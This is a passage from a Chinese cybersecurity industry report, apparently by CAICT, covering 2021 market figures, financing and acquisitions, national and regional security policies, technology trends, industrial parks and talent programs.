家国际专业网络安全上市企业 2021 年的平均营收 为 11.54 亿美元,2021 年营收的平均增速为 24.9%,较 2020 年同期 增速小幅提升。除 SolarWinds 由于受供应链攻击事件影响,营收出 现 29.5%的大幅下降以外,其余企业的营收均保持增长。其中,得益 于新冠疫情下互联网流量激增,以及基于云计算的安全工具和安全服 务的需求强劲,CrowdStrike、Okta、Zscaler 和 Cloudflare 的营收增速 均超过 50%,显著高于同类企业。 来源: 中国信通院根据公开资料整理 图 4 2021 年国际主要网络安全上市企业营收情况 2.企业盈利能力进一步减弱,多数企业净利润下滑 在净利润方面 ,2021 年的盈利情况较 2020 年更为严峻。长期 以来,为了获取全球网络安全市场发展机遇,该领域的企业将大量经 营收入投向产品技术研发和市场营销,进而导致企业净利润持续为负。 国际网络安全上市企业利润数据显示,19 家国际专业网络安全上市 企业 2021 年的平均净亏损为 1. 13 亿美元,与 2020 年同期相比,亏 损幅度有所增加。具体来看,除 Check Point 、Fortinet 等四家企业实 现盈利以外,其余企业均为亏损状态。从净利润增速来看 ,2021 年 仅有 Fortinet 和 Avast 两家企业实现净利润增长,其余企业净利润均 出现下滑,其中 Telos 和 CyberArk 的净利润更是分别出现了-2656.9% 和- 1357.9%的极端下滑,对企业的稳定经营产生不利影响。 来源: 中国信通院根据公开资料整理 图 5 2021 年国际主要网络安全上市企业净利润情况 3.企业研发投入迅猛增长,研发费用率进一步提升 研发费用方面 ,2021 年国际主要网络安全上市企业研发投入迅 猛增长 ,研发费用率进一步提升。19 家主要网络安全上市企业 2021 年的平均研发费用达到 2.69 亿美元,比 2020 年高出 0.3 亿美元;Palo Alto 和 Splunk 的研发费用均超过 10 亿美元,显著高于其他同类企业。 研发费用增速方面,所选企业的研发费用平均增速为 37.8%,较 2020 年高出 11 个百分点。除 SolarWinds 和 Avast 的研发费用下降以外, 其他企业均保持较快增长,其中 Okta、Zscaler 和 CrowdStrike 的增速 均超过 70% ,连续多年保持高速增长。研发费用率4方面, 19 家主要 网络安全上市企业的平均值为 24.7%,较 2020 年提高 3 个百分点, 新兴网络安全企业的研发费用率高于老牌网络安全上市企业。 4 研发费用率=2021 年研发费用/[(2020 年营收+2021 年营收)/2]。 来源: 中国信通院根据公开资料整理 图 6 2021 年国际主要网络安全上市企业研发费用情况 (四)资本大量涌入网络安全,融资并购均创造历史5 1.资本加持力度大,融资交易规模为十年来最高 2021 年是全球网络安全投融资活动具有里程碑意义的一年。无 论是在融资事件数,还是融资金额方面,均创造了近十年来的最高纪 录。2021 年,全球网络安全融资活动为 1042 件,较 2020 年提高43. 1%; 继 2020 年首次突破百亿美元大关之后,2021 融资金额大幅增长 136.2% ,达到 293 亿美元,创造了近十年来的最高纪录。 5 本节投融资及并购数据均来自 Momentum Cyber 于 2022 年 2 月发布的报告《Cybersecurity Almanac 2022》 来源: 中国信通院根据 Momentum Cyber 数据整理 图 7 2011-2021 年网络安全初创企业融资态势 从融资轮次分布看,全球网络安全融资主要集中在早期和后期阶 段。早期融资事件数占比 42% ,C 轮及之后的融资事件数占比 29%, C 轮及之后的融资金额占总融资额的 75%。与 2020 年相比,C 轮及 之后的融资事件增长 58.4%,对应的融资金额更是实现了 216.2%的超 高速增长。大额融资方面 ,云安全领域的 Lacework 和 Orca Security, 身份管理与访问控制领域的Trulioo和Transmit Security 的单笔融资均 超 3 亿美元,这表明热门赛道内具备清晰商业模式和较强技术实力的 独角兽企业正在迅速吸引资本关注。 来源: 中国信通院根据 Momentum Cyber 数据整理 图 8 2021 年网络安全初创企业融资轮次分布 融资技术领域方面,从融资事件数来看,风险管理与合规、数据 安全、身份管理与访问控制等是历年来融资较为活跃的重点领域,领 域融资活动占比均超过 10%。2021 年,身份管理与访问控制超过网 络与基础设施安全,融资活动数量排名第三。风险管理与合规领域的 融资数量占比从 2020 年的 18%下降至 16%;网络与基础设施安全领 域的融资数量占比从 2020 年的 12%下降至 10%;安全运营/应急响应 /威胁情报相关融资数量占比由 2020 年的 11%下降至 9%。从融资金 额来看,前三大热门融资领域分别为云安全、身份管理与访问控制和 终端安全 ,2021 年对应的融资金额分别为 43.4 亿美元、34.8 亿美元 和 28.9 亿美元。 来源: 中国信通院根据 Momentum Cyber 数据整理 图 9 2021 年全球网络安全融资领域分布情况 2.并购交易异常活跃,竞争格局加速洗牌与变革 2021 年网络安全并购活动异常活跃, 呈现出爆发增长态势 。 Momentum Cyber 数据显示,2021 年全球共完成了 286 起并购活动, 同比增长 60.7%;并购交易金额达到 775 亿美元,同比增长近 3 倍 (294.6%)。 来源: 中国信通院根据 Momentum Cyber 数据整理 图 10 2011-2021 年全球网络安全并购活动态势 从并购的技术领域来看, 安全咨询与服务和安全托管服务是 2021 年最为热门的两大并购领域,并购活动占比均为 17%。与 2020 年相比,安全咨询与服务、安全托管服务、云安全、安全运营的并购 活动占比显著上升,与此同时,身份管理与访问控制、网络与基础设 施安全领域的并购活动占比下降。2021 年,终端安全、云安全、身 份管理与访问控制等领域均出现交易规模超过 50 亿美元的并购活动。 在云安全领域,私募股权巨头 Thoma Bravo 以 123 亿美元收购网络安 全公司 Proofpoint;在终端安全领域, 由 Advent International 领导的 财团以超过 140 亿美元的价格收购老牌杀毒软件厂商 McAfee。频繁 的大额并购预示着网络安全市场进入新一轮洗牌与变革期。 来源: 中国信通院根据 Momentum Cyber 数据整理 图 11 2021 年全球网络安全并购领域分布情况 第二章 我国网络安全产业发展动态 2021 年,在国家经济稳定恢复、行业企业对网络安全的重视程 度持续提升的大背景下,我国网络安全产业进入复苏回暖期,产业规 模达到 1905. 1 亿元。政策法规、技术产品、市场主体、资本等内外 部因素呈现积极变化。具体来看,政策法规方面,国家、行业及地区 等多层次的网络安全政策体系协同发力,推动产业发展迈向新阶段。 技术产品方面,网络安全技术、理念和产品迭代升级,新场景和新技 术方面布局不断优化。市场主体方面,网络安全上市企业营业收入和 研发投入均保持增长。资本方面,网络安全融资爆发式增长,数据安 全等热门领域获得高度关注。 (一)网络安全产业发展向好,技术创新高度活跃 1.2021 年网络安全产业回归高速增长区间 根据中国信通院的统计测算,2021 年我国网络安全产业规模达 到 1905. 1 亿元6,较 2020 年增长 16.6%,预计 2022 年产业仍将保持 高速增长,产业规模约为 2169.9 亿元,增速约为 13.9%。 6 产业规模数据以国家统计局、工信部等相关单位公布的网络及信息安全产品服务收入或增加值相关数据 为基础,通过信通院网络安全产业规模测算框架进行综合测算得出。2019 年及 2020 年部分基础数据由于 规模以上入统企业数量或企业年度审计数据变动等原因发生调整,导致年度核定数据与快报、公报数据存 在差异。本次测算以年度核定数据为准,对 2019 年和 2020 年产业规模历史数据及增速进行了调整。 来源: 中国信通院 图 12 2016-2022 年中国网络安全产业规模及增长情况 2.区域分布方面,华北、华东区域市场份额小幅提升 网络安全方面的投入与地区的信息化建设和经济发展水平具有 较大的相关性。从调研数据来看,华北、华东、华南三大区域仍是网 络安全市场发展的核心区域, 三大核心区域合计市场份额占比超过 70%。上述区域经济发展水平相对较高,区域内行业客户对网络安全 的需求较为旺盛。与 2020 年相比,华北区域、华东区域市场份额均 提升约 5 个百分点,并且华东区域超过华南区域,成为国内最第二大 区域市场,华南区域市场份额出现明显下降。华北和华东区域市场份 额的提升,得益于该区域政府在网络安全方面的发展与促进计划。例 如北京、上海、山东等地近年来均发布网络安全相关指引规划,强调 保障网络安全建设合理投入,提升区域网络安全产业创新活力。 来源: 中国信通院网络安全产业调研 图 13 2021 年中国网络安全市场区域分布情况 3.下游行业客户方面,金融行业采购金融占比增加 从调研数据来看,网络安全下游客户仍以政府(含公共企事业单 位)、电信、金融行业为主,来自上述行业的营收合计占比接近 60%。 与 2020 年相比,来自政府(含公共企事业单位)、电信行业的营收比 例小幅下降,来自金融行业的营收提升。近年来,受信息化投资加大、 安全威胁加剧、网络安全监管趋严等因素驱动,金融业客户的网络安 全产品需求增加。而对于电信运营商而言,为达到《网络安全法》《关 键信息基础设施安全保护条例》等法律法规对电信运营商在关基安全 方面提出的更高要求,同时更好地服务于业务转型,其安全能力的构 建不再单纯依赖于传统的从第三方采购网络安全产品及服务这种模 式,更多的是发挥自身数据资源、网络技术等方面优势,通过自主研 发、技术合作等方式构建核心安全保障能力。 来源: 中国信通院网络安全产业调研 图 14 2021 年中国网络安全下游客户行业分布情况 4.销售渠道方面,多数企业已建立辐射全国的营销网络 从调研数据来看,多数网络安全企业已建立一套辐射国内重点地 区的营销网络 ,并且采取直销为主的销售模式。与 2020 年相比,营 销网络覆盖超过 30 个省份的网络安全企业比例进一步提升,通过增 加销售网点数量、扩大销售队伍、完善渠道销售体系建设等方式,网 络安全企业触达客户的能力正在进一步增强。从销售模式来看,企业 与渠道代理商的合作程度正在日益加深 ,2021 年渠道为主的销售模 式占比提升约 4 个百分点。 来源: 中国信通院网络安全产业调研 图 15 2021 年中国网络安全销售地域覆盖度及主要模式 (二)网安政策多措并举,助推产业高质量发展 在“十四五”和两个百年计划的开局之年,网络安全成为国家安 全体系能力建设的重要方向。国家陆续颁布多项网络安全相关法律法 规和顶层规划,行业、地方积极响应,密集出台配套的网络安全相关 政策文件,为我国网络安全产业发展提供了新契机和更有力的支持。 1.网络安全相关法律法规陆续落地 网络安全领域重要立法密集出台。2021 年 6-8 月,《数据安全法》 《关键信息基础设施安全保护条例》《个人信息保护法》等领域基础 性法律陆续出台,并分别于同年 9- 11 月落地实施,数据安全、关基 保护方面法治建设力度的不断加强,标志着我国数据及关键信息基础 设施保护进入依法治理新阶段。 多部网络安全相关规章政策落地。2021 年 7 月,工业和信息化 部、中央网信办、公安部发布《网络产品安全漏洞管理规定》,对网 络产品提供者、网络运营者,以及从事漏洞发现、收集、披露等活动 的组织或个人应承担的责任和履行的义务进行规定。2021 年 12 月, 中央网信办等十三部门联合修订了《网络安全审查办法》,并于次年 2 月正式施行,办法旨在确保关键信息基础设施供应链安全、保障网 络安全和数据安全、维护国家安全。2021 年 7 月,中央网信办、发 展改革委、工业和信息化部等五部门发布《汽车数据安全管理若干规 定(试行)》,目的是为了规范汽车数据处理活动,保护个人、组织的 合法权益,维护国家安全和社会公共利益,促进汽车数据合理开发利 用。 2.国家及行业顶层规划提出安全新要求 党中央国务院高度重视网络安全工作。2021 年 11 月,中央政治 局审议《国家安全战略(2021-2025 年)》,明确提出加快提升网络 安全、数据安全、人工智能安全等领域的治理能力。2021 年 12 月, 中央网络安全和信息化委员会发布《“十四五”国家信息化规划》,强 调要统筹发展和安全,并部署了包括培育先进安全的数字产业体系在 内的 10 项重大任务。2022 年 1 月,国务院印发《“十四五”数字经 济发展规划》,提出要着力强化数字经济安全体系,增强网络安全防 护能力,提升数据安全保障水平,有效防范各类风险。2022 年 6 月, 国务院印发《关于加强数字政府建设的指导意见》,提出要强化安全 管理责任,落实安全制度要求,提升安全保障能力,提高自主可控水 平,筑牢数字政府建设安全防线。 各行业领域“十四五”规划对安全提出新愿景。2021 年 11 月, 工业和信息化部印发《“十四五”信息通信行业发展规划》《“十四五” 软件和信息技术服务业发展规划》《“十四五”大数据产业发展规划》 多份行业发展规划,针对信息通信行业、软件和信息技术服务业以及 大数据产业,提出网络和数据安全发展新思路和新要求。2021 年 11 月,工业和信息化部等十部门联合发布《“十四五” 医疗装备产业发 展规划》,提出要加快健全安全保护体系,保障医疗装备本体安全、 使用安全以及网络安全。2022 年 2 月,中国人民银行、市场监管总 局等四部门联合印发《金融标准化“ 十四五”发展规划》,明确需健全 金融信息基础设施标准,强化金融网络安全标准防护,推进金融业信 息化核心技术安全可控标准建设。 3.多行业领域迎来数据安全等新需求 金融行业 ,2022 年 1 月,银保监会印发《关于银行业保险业数 字化转型的指导意见》,指出要强化网络安全防护、加强数据安全和 隐私保护,并提出网络安全、数据安全和风险管理水平全面提升的工 作目标。同月,中国人民银行印发《金融科技发展规划(2022-2025 年)》, 明确要求做好数据安全保护,并提出包括健全安全高效的金融科技创 新体系、架设安全泛在的金融网络等内容的与安全相关的四项重点任 务。 汽车行业 ,2021 年 9 月,工业和信息化部发布《关于加强车联 网网络安全和数据安全工作的通知》,要求加强汽车、网络、平台、 数据等安全保护,监测、防范、及时处置网络安全风险和威胁,确保 数据处于有效保护和合法利用状态,保障车联网安全稳定运行。2022 年 4 月,工业和信息化部、公安部、交通运输部等 5 部门联合发布《关 于进一步加强新能源汽车企业安全体系建设的指导意见》,从完善安 全管理机制、加强事故响应处置、健全网络安全保障体系等七个方面 展开,对新能源车企的安全体系建设提出了全面要求。 医疗、 电信等行业 ,2021 年 4 月,国家医疗保障局发布《关于 印发加强网络安全和数据保护工作指导意见》,提出到“ 十四五”期末, 医疗保障系统网络安全和数据安全保护制度体系更加健全,智慧医保 和安全医保建设达到新水平。2022 年 4 月,中央网信办、国家发展 改革委、工业和信息化部联合印发《深入推进 IPv6 规模部署和应用 2022 年工作安排》,要求加快 IPv6 安全关键技术研发和应用、提升 IPv6 网络安全防护和监测预警能力、加强 IPv6 网络安全管理和监督 检查。市场监管总局、中央网信办发布《关于开展数据安全管理认证 工作的公告》,鼓励网络运营者通过认证方式规范网络数据处理活动, 加强网络数据安全保护。 4.各地区网络安全配套政策密集出台 数据安全成为区域数字经济发展的重要关切。2021 年 12 月,江 苏省发布《江苏省公共数据管理办法》, 旨在规范公共数据管理,保 障公共数据安全,推进数字化发展,加快建设数字政府,提升政府治 理能力和公共服务水平。2022 年 4-5 月,广州市、河北省、江苏省分 别发布《广州市数字经济促进条例》《河北省数字经济促进条例》《江 苏省数字经济促进条例》,对培育壮大数据安全服务产业链、开展网 络安全领域关键核心技术研发攻关、健全工业互联网或工业信息安全 保障体系等提出更高要求,推动网络安全产业发展。2022 年 5 月, 深圳市发布《深圳市数字政府和智慧城市 “十四五”发展规划》,提 出要构建全市统一网络安全体系架构,打造全天候、全场景的网络安 全保障体系。同月,江西省人民政府印发《江西省“十四五”数字经 济发展规划》,提出要积极布局信息安全和数据服务等新兴领域,健 全网络安全保障体系,强化数据安全保护。2021 年 12 月和 2022 年 5 月,福建省、辽宁省分别发布《福建省大数据发展条例》《辽宁省大 数据发展条例》,对明确数据安全主体责任、建立实施数据分类分级 保护制度、开展数据安全风险评估和应急演练等进行了详细要求。 基础设施保护及人才培养关注热度不减。2021 年 12 月,湖南省 发布《湖南省网络安全和信息化条例》, 旨在保障网络安全,促进信 息化发展,提高数字化水平,推进经济社会高质量发展。2022 年 3 月,新疆维吾尔自治区通过《新疆维吾尔自治区关键信息基础设施安 全保护条例》,提出要执行网络安全等级保护制度、重点保护制度和 安全审查制度,吸引和鼓励网络安全专门人才从事关键信息基础设施 安全保护工作等。2022 年 2 月,河南省发布《河南省 “十四五”新 型基础设施建设规划》,提出要加强关键信息基础设施保护,提升网 络安全监测预警能力,提高关键信息基础设施安全运行水平。2022 年 5 月,武汉市发布《关于进一步支持国家网络安全人才与创新基地 发展若干政策的通知》,提出支持国家关键信息基础设施安全保护培 训基地建设,继续实施 “ 网络安全万人培训资助计划”,组建网安基 地产业基金等多项政策举措。2021 年 9 月,江苏省发布《江苏省网 络安全工程专业技术资格条件(试行)》,积极推进省内网络安全工程专 业技术人才队伍建设,着力破除“唯学历、唯资历、唯论文、唯奖项” 等倾向。 (三)网络安全创新高度活跃,技术产品加速升级 动态边界、智能分析、协同联动、安全云化成为网络安全技术演 进的主要趋势。零信任、云原生安全、检测与响应成为业界关注度较 高的三大技术。 与上次调研结果相比,零信任的关注度仍排名第一, 云原生安全、检测与响应(XDR)技术获得的关注度大幅增加。根据 Gartner 研究预测,2022 年全球将有超过 75%的企业在生产环境中运 行容器化应用。云原生安全主要围绕云原生应用生命周期,提供多阶 段多角度的安全防护,源代码扫描、云原生漏洞扫描、虚拟补丁、无 服务器安全、访问安全等的一系列云原生安全技术发展迅速。新一代 网络攻击手段的演进,使得有效的威胁检测与响应能力成为重要的实 战化对抗基础,围绕终端、网络、运营等的威胁检测与响应技术,为 新型网络威胁的应对提供了新思路。 来源: 中国信通院网络安全产业调研 图 16 业界关注度较高的网络安全新技术/新理念排名 从调研数据来看,数据安全、工业互联网安全相关技术产品成为 网络安全企业未来三年重点研发方向。伴随着《数据安全法》、《个人 信息保护法》等法律法规的出台,数据安全相关技术的热度大幅攀升, 在网络安全企业未来三年重点研发方向词云图中,“数据”相关的词 频最高,涉及隐私计算、数据流转监测、数据分级分类、数据共享交 换等细分领域。目前中国工业互联网产业规模超过万亿元大关,对安 全保障的需求与日俱增,因此工业互联网安全相关技术产品也成为网 安企业重点研发方向之一,涉及安全靶场、漏洞挖掘、智能防护平台 等多个细分领域。此外,零信任、云安全、检测与响应、运营与托管、 应用与开发安全等也成为未来三年网络安全企业重点布局的技术方 向。 来源: 中国信通院网络安全产业调研 图 17 网络安全企业未来重点研发方向词云图 从调研数据来看,网络安全企业在新兴领域的布局进一步完善。 一方面,深度探索新兴技术在网络安全领域的应用;另一方面,积极 开展针对新兴场景的安全能力适配,提高安全产品专业化水平。网络 安全企业在大数据领域的布局最多,原因在于 “大数据+ 网络安全” 具有双重价值属性,在场景范畴中,海量数据的全生命周期安全需求, 成为网络安全最具增长潜力的市场;在技术范畴中,大数据、人工智 能等赋能安全技术升级,成为提升网络安全产品检测与分析能力的利 器。此外,企业在工业互联网安全方面的布局也在持续扩张,据中国 信通院测算,工业互联网安全产业存量规模由 2017 年的 13.4 亿元增 长至 2019 年的 27.2 亿元,年复合增长率高达 42.3%7,广阔的市场空 7 中国信通院:《工业互联网产业经济发展报告(2020 年)》,2020 年 8 月。 间为网络安全企业提供了研发驱动力。 来源: 中国信通院网络安全产业调研 图 18 网络安全企业现有产品已覆盖的新兴领域 (四)企业主体稳定经营,营收和研发保持增长 1.平均营收增速有所回升,部分企业经营不容乐观 在营收方面 ,2021 年大部分上市企业的营收保持增长,平均增 速水平较 2020 年有所回升。选取的国内网络安全上市企业营收数据8 显示,21 家网安企业 2021 年的平均营收为 18.0 亿元,2021 年营收 的平均增速为 21.4%,较 2020 年同期水平(13.8%)有所回升。21 家上市企业中,有 7 家企业的 2021 年营收增速超过 30%;任子行和 飞天诚信的营收持续下降,经营业绩不容乐观。 8 深信服、天融信的营收仅为安全业务部分。 来源: 中国信通院根据公开资料整理 图 19 2021 年我国主要网络安全上市企业营收情况 2.近半数企业净利润出现下滑,亟需打破发展困境 在净利润9方面 ,近半数企业净利润同比下滑, 网络安全企业亟 需打破“增收不增利”的困境。在整体大环境趋弱的形势下,部分企 业对于市场发展过于乐观,在规模扩张、研发投入增加的前提下,营 业收入低于预期水平,导致净利润大幅下滑。北信源、任子行两家企 业 2021 年净利润增速下滑均超过 400%,奇安信、北信源、任子行、 飞天诚信 4 家企业净利润均为负数。在高度依赖政府和事业单位、能 源、电信运营商等预算制客户的背景下,网络安全企业对于收入端的 议价和主导能力低,因此应审慎对待业界推崇的高投入策略,停止非 理性的价格战,压缩各项营业成本,推动盈利水平提升。 9 为避免其他业务影响,在分析网络安全净利润时剔除深信服、天融信。 来源: 中国信通院根据公开资料整理 图 20 2021 年我国主要网络安全上市企业净利润情况 3.企业研发投入普遍增长,增速创历史新高 研发费用方面 ,2021 年我国主要网络安全上市企业研发投入普 涨,研发费用率提升 4.4 个百分点。19 家10主要网络安全上市企业2021 年的平均研发费用达到 3.43 亿元, 比 2019 年高出 0.8 亿元;奇安信 的研发费用超过 17 亿元,显著高于其他同类企业。研发费用增速方 面,所选企业的研发费用平均增速为 40.4%,创历史新高。除飞天诚 信的研发费用小幅下降以外,其他企业均保持较快增长,其中云涌科 技、 中孚信息和安恒信息的增速分别达到了 133.55% 、94. 18%和 71.82%,增速显著高于其他同类企业。研发费用率11方面 ,19 家主要 网络安全上市企业的平均值为 22.3%, 比 2020 年提升 4.4 个百分点。 10 为避免其他业务影响,在分析网络安全研发费用时剔除深信服、天融信。 11 研发费用率=2021 年研发费用/[(2020 年营收+2021 年营收)/2]。 来源: 中国信通院根据公开资料整理 图 21 2021 年我国主要网络安全上市企业研发费用情况 (五)资本赋能效应显现,热门领域初创企业崭露头角 1.网络安全融资爆发式增长,数据安全仍为最热门领域 2021 年 ,在政策加码、数字经济安全挑战等多重因素驱动下, 我国网络安全融资呈现爆发式增长。据不完全统计,2021 年我国网 络安全领域的融资12活动为 148 件,披露13的融资总额约为 150.4 亿元, 融资事件数和金额均比 2020 年增长超过 90%。其中,数据安全、威 胁检测与响应、云安全、业务与内容安全领域均出现单笔融资超过 5 亿元的事件,热门赛道的能力型企业更易脱颖而出。 12 仅统计与私募股权投资(PE)和风险投资(VC)相关的融资活动,不包括 IPO 、并购、定向增发。 13 由于多起战略投资案例未披露交易金额,可能造成该阶段交易总额被低估。 来源: 中国信通院根据公开资料整理 图 22 2021 年我国网络安全初创企业 PE/VC 融资态势 从融资轮次来看,目前我国网络安全融资活动主要集中于早中期 阶段 ,多数企业单笔融资金额较小。 与 2020 年相比,Pre-A/A/A+轮 融资事件数占比、B 轮及之前阶段的融资金额占比显著提升。从具体 比例来看,2021 年,种子/天使轮与 Pre-A/A/A+轮的融资事件数合计 达到总融资事件的 48%,B 轮及之前阶段的融资金额合计达到总融资 金额的 47%,这说明我国网络安全领域融资仍以早中期为主,对于趋 近成熟的网络安全企业支持不足。值得关注的是,2021 年虽然我国 网络安全融资事件数较多,但普遍存在单笔金额较小的问题。在已披 露金额的融资事件中,约有 53%的单笔融资金额低于 5000 万元人民 币。 来源: 中国信通院根据公开资料整理 图 23 2021 年我国网络安全融资轮次分布情况 从融资的技术领域来看,数据安全、安全服务、工业互联网(工 控)安全、威胁检测与响应是热门融资领域 ,与 2020 年保持一致。 其中,数据安全领域涌现出华控清交、数牍科技、翼方健数等一批专 注于隐私计算的创新企业,为数据安全高效流通赋能。安全服务领域 则有一批以威胁对抗、智能攻防为特色的服务型初创企业崭露头角。 2021 年融资事件分布于 15 个细分技术领域,其中,前 10 大细分领 域的融资事件合计占总融资事件的 91.2%,对应的融资金额合计占总 融资金额的 95.4%。 来源: 中国信通院根据公开资料整理 图 24 2021 年我国网络安全融资前 10 大细分领域分布情况 2.2021 年并购交易和 IPO14数量屈指可数 和国外网络安全领域并购交易和 IPO 的活跃态势相比 ,我国相 关交易数量屈指可数。据不完全统计,2021 年仅有 3 起已完成的网 络安全并购案例,以及信安世纪在科创板实现 IPO。 目前网络安全市 场企业众多,分布在各细分赛道,亟需通过并购整合和企业退出机制 减少恶性竞争,降低资源内部损耗,提升规模效应和行业集中度。 表 1 2021 年中国网络安全领域典型并购案例 被收购方 收购方 持有比例 披露时间 弗兰科 安恒信息 69.20% 2021.01 国泰网信 安天集团 100% 2021.04 万里红 东方中科 78.33% 2021.10 来源: 中国信通院根据公开信息整理 14 IPO:全称 Initial Public Offerings ,指企业首次公开发行股票。 第三章 建设网络安全产业良性生态 良好的产业生态是网络安全产业健康发展的基础。近年来,我国 网络安全产业生态正在逐步完善,协会联盟在行业自律、交流引领、 意识培育方面发挥积极引导作用;国家级网络安全产业园辐射范围再 度扩大,全国多地开始搭建特色产业园区推动产业集聚发展;人才培 养更加多样,通过开展实战比赛、资助创新活动、打造网安基地等培 育创新实战人才;与此同时,我国积极为推动全球互联网更好发展、 构建更加公平合理的互联网治理体系贡献中国智慧和中国方案。 (一)协会联盟搭建平台助推产业发展 行业自律方面,截至 2021 年底,中国通信企业协会通信网络安 全专业委员会已为 143 家单位颁发了 224 个涉及风险评估、安全设计 与集成、应急响应、安全培训的四类通信网络安全服务能力评定证书, 促进了电信和互联网行业网络安全服务的规范开展。交流引领方面, 2022 年 4 月,电信企业、研究机构等院等单位共同发起成立 “ 中国 网络安全产业创新发展联盟”,汇聚了国内网络安全领域顶尖院士专 家,以及来自产学研用资各领域近百家单位,旨在汇聚网络安全产业 链上下游资源,打造国家级网络安全产业交流促进平台、供需对接平 台、成果转化平台。2022 年 7-8 月,中国网络空间安全协会联合产业 各方举办“2022 数字安全与法治高峰论坛”和“2022 年网络文明大会 个人信息保护论坛”,推动我国数据安全保护领域优秀案例的宣传推 广。 (二)积极打造产业聚集和示范高地 国家级网络安全产业园辐射范围再度扩大。在北京、长沙两地产 业园方面,国家网络安全产业园区政策落地及园区建设不断推进。 2021 年 5 月,北京市通州区发布《关于加快推进国家网络安全产业 园区(通州园)产业发展若干措施(试行)》,鼓励园内企业发展、融 资、参与重大工程项目、搭建服务平台等,并提出对应的支持方式与 标准,最高可奖励 100 万元。2021 年 4 月,国家网络安全产业园(长 沙)的“ 四大中心”,即城市网络安全运营中心、信创产业协同适配中 心、工业互联网安全应用推广中心以及网络安全测试认证中心,全部 建成并投入运营。在新获批产业园方面,第三个国家级网络安全产业 园区已于川渝两地诞生。2022 年 5 月, 由川渝两地联合申报的 “ 国 家网络安全产业园区(成渝)”获工信部批复,成为国内首个跨省级 地域国家级网络安全产业园区,未来两地将秉持 “差异化错位突破、 跨地域协同发展” 的原则,打造 “特色鲜明、优势互补,供需一体、 协同发展” 的网络安全产业生态布局。 多地搭建特色产业园区推动产业集聚发展。2021 年 1 月,粤港 澳大湾区(广州)网络安全产业园在广州市黄埔区正式授牌,目前已 与中国网安、绿盟科技、奇安信、360 、启明星辰、安恒信息等国内 龙头企业达成战略合作。2021 年 4 月,滨海高新区国家网络安全产 业园项目启动暨签约仪式在天津举行,该产业园总投资 17.6 亿元, 旨在服务高新区信创产业发展,为产业链上下游企业提供更有力的支 撑和条件,助推 “ 中国信创谷”建设进入快车道。2022 年 1 月,上 海市网络安全产业示范园在普陀揭牌成立,预计到 2025 年,引进、 培育 5 家以上网络安全龙头企业和20 家以上网络安全细分明星企业, 建成 2-3 个国内领先的网络安全产业集群,网络安全产业规模达到百 亿级,带动相关产业规模达到千亿级。2022 年 2 月,北方网络安全 产业园启动仪式在沈阳举行,园区主要规划了北方实验室、国家工程 研究中心、网络安全生态等三大板块,项目计划投资 2.5 亿元,总建 筑面积 5.5 万平方米。 聚焦行业领域引领产品服务示范推广。截至 2022 年 9 月,网络 安全卓越验证示范中心已建成浙江、河北、上海、河南等 4 个区域分 中心,聚合产业各方能力优势构建协同创新体系。2021 年 12 月,工 信部发布首批 5G 应用安全创新示范中心遴选认定结果,入选系列 “5G 应用安全创新示范中心”。 (三)多层次培育创新实战型人才 实战比赛锤炼网络安全人才队伍。2021 年 12 月,第十届全国电 信和互联网行业网络安全管理职业技能竞赛在武汉圆满收官,历时 3 个月,最终共有 378 名个人选手,126 支参赛团队入围全国总决赛, 参赛对象涉及通信、互联网、电力、教育、政企等多个行业和领域的 网络安全相关技术专家和学生。2022 年 8 月,“网鼎杯”官方资格赛 圆满结束,其中将有 500 支战队、2000 名选手晋级半决赛,在基于 平行仿真技术构建的多业务、全场景城市靶场中上演问鼎之战。 多方资助鼓励高校学生开展网安创新活动。2022 年 7 月,在中 央网信办指导下,中国网络空间安全协会、中国互联网发展基金会联 合企业院校共同发起网络安全学院学生创新资助计划,引导高校学生 面向产业网络安全实际需求和共性问题开展创新研究。其中,天融信 科技集团、奇安信集团、中国互联网发展基金会网络安全专项基金等 作为资助方总计出资 7800 万元,连续五年计划资助 1200 名学生开展 创新研究。 网安基地打造网络安全“黄埔军校”。2021 年 9 月,武汉大学和 华中科技大学网络安全专业 2000 多名学生入驻国家网安基地,较去 年增长超过 40%;据不完全统计,20 余家单位在国家网安基地培训 中心开展培训班及现场教学活动 50 余场,累计规模超过 5000 人次。 2021 年以来,湖南长沙、湖南永州、重庆,湖北孝感等地积极打造 网络安全人才培养基地,为各地加快构建网络安全人才培养体系、探 索校地企合作人才培养机制奠定坚实基础。 (四)倡导各国共同构建网络空间命运共同体 近年来,我国提出的“构建网络空间命运共同体”正逐渐成为全 球共识,为推动全球互联网更好发展、构建更加公平合理的互联网治 理体系贡献了中国智慧和中国方案。2021 年 8 月,在中非互联网发 展与合作论坛上,中国发起中非携手构建网络空间命运共同体倡议, 秉持“发展共同推进、安全共同维护、治理共同参与、成果共同分享” 的理念,把网络空间建设成为发展共同体、安全共同体、责任共同体、 利益共同体。2022 年 2 月,“中国+ 中亚五国” 外长第三次会晤通过“中 国+ 中亚五国”数据安全合作倡议,各国一致认同应在相互尊重基础上, 加强沟通交流,深化对话与合作,共同构建和平、安全、开放、合作、 有序的网络空间命运共同体。2022 年 4 月,国家主席习近平于博鳌 亚洲论坛 2022 年年会开幕式上提出全球安全倡议,强调 “我们要坚 持共同、综合、合作、可持续的安全观,共同维护世界和平和安全”。 第四章 网络安全产业发展趋势展望 2022 年是实施 “十四五”规划的关键之年,数字经济迅猛发展, 网络安全迎来新的机遇与挑战。展望未来,产业方面,在政策扶持、 需求扩张、应用升级等多方驱动下,我国网络安全产业持续向高质量 发展。技术方面,在内外需求的双向牵引下,安全技术寻求发展新范 式,助力建设动态演进、按需安全的新型基础设施安全保障能力。政 策方面,“十四五”时期,我国网络安全相关政策监管将再上新台阶, 在新型融合性网络安全保障体系、关键信息基础设施安全保护、数据 安全风险管控和网络安全产业发展方面有望迎来新的政策加持。 (一)多方利好驱动网络安全产业高质量发展 在政策扶持、需求扩张、应用升级等多方驱动下,我国网络安全 产业综合实力将显著增强,企业实力、人才队伍等产业基础将不断夯 实,推动网络安全产业向高质量发展。产业规模方面,“十四五” 以 来,重点行业领域相关规划文件对网络安全投入提出更高要求,如, 电信等重点行业网络安全投入占信息化投入比例达 10%,医疗卫生机 构新建信息化项目的网络安全预算不低于项目总预算的 5%等,安全 投入的大幅增加推动网络安全产业保持高速增长。企业实力和人才队 伍方面,随着网络安全需求不断扩张,人才、企业培育政策陆续落地, 网络安全产业要素能力将进一步增强,网络安全龙头企业竞争力持续 提升,“专精特新”独角兽企业数量逐步壮大,人才队伍培养体系更 加完善。 (二)内外需求牵引安全技术寻求发展新范式 在内外需求的双向牵引下,智能分析、主动防御、 自适应响应, 以及服务和场景赋能的一体化安全创新实践正在加速落地,助力建设 